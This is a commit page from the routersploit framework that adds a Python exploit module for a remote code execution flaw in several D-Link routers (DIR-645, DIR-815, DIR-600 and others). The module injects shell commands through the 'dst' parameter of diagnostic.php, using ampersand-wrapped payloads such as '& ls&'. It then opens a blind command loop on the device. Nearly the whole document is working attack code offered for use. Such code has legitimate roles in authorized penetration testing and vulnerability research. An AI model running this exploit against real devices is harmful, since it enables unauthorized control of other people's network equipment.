Commit e3a9952d by Marcin Bury

Adding multiple rce exploit for multiple dlink devices.

parent 3e39991e
from routersploit import (
exploits,
print_success,
print_status,
print_error,
http_request,
mute,
validators,
shell,
)
class Exploit(exploits.Exploit):
"""
Exploit implementation for D-Link DIR-645 and DIR-815 Remote Code Execution vulnerability.
If the target is vulnerable, command loop is invoked that allows executing commands on the device.
"""
__info__ = {
'name': 'D-Link DIR-645 & DIR-815 RCE',
'description': 'Module exploits D-Link DIR-645 and DIR-815 Remote Code Execution vulnerability which allows executing command on the device.',
'authors': [
'Michael Messner <devnull[at]s3cur1ty.de>', # Vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'http://www.s3cur1ty.de/m1adv2013-017',
],
'devices': [
'DIR-815 v1.03b02',
'DIR-645 v1.02',
'DIR-645 v1.03',
'DIR-600 below v2.16b01',
'DIR-300 revB v2.13b01',
'DIR-300 revB v2.14b01',
'DIR-412 Ver 1.14WWB02',
'DIR-456U Ver 1.00ONG',
'DIR-110 Ver 1.01',
]
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)
port = exploits.Option(80, 'Target Port')
def run(self):
if self.check():
print_success("Target is vulnerable")
print_status("Invoking command loop...")
print_status("It is blind command injection, response is not available")
shell(self, architecture="mipsel")
else:
print_error("Exploit failed - target seems to be not vulnerable")
def execute(self, cmd):
cmd = "%26 {}%26".format(cmd.replace("&", "%26"))
url = "{}:{}/diagnostic.php".format(self.target, self.port)
headers = {"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"}
data = "act=ping&dst={}".format(cmd)
http_request(method="POST", url=url, headers=headers, data=data)
return ""
@mute
def check(self):
url = "{}:{}/diagnostic.php".format(self.target, self.port)
headers = {"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"}
data = {"act": "ping",
"dst": "& ls&"}
response = http_request(method="POST", url=url, headers=headers, data=data)
if response is None:
return False # target is not vulnerable
if response.status_code == 200 and "<report>OK</report>" in response.text:
return True # target is vulnerable
return False # target is not vulnerable
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment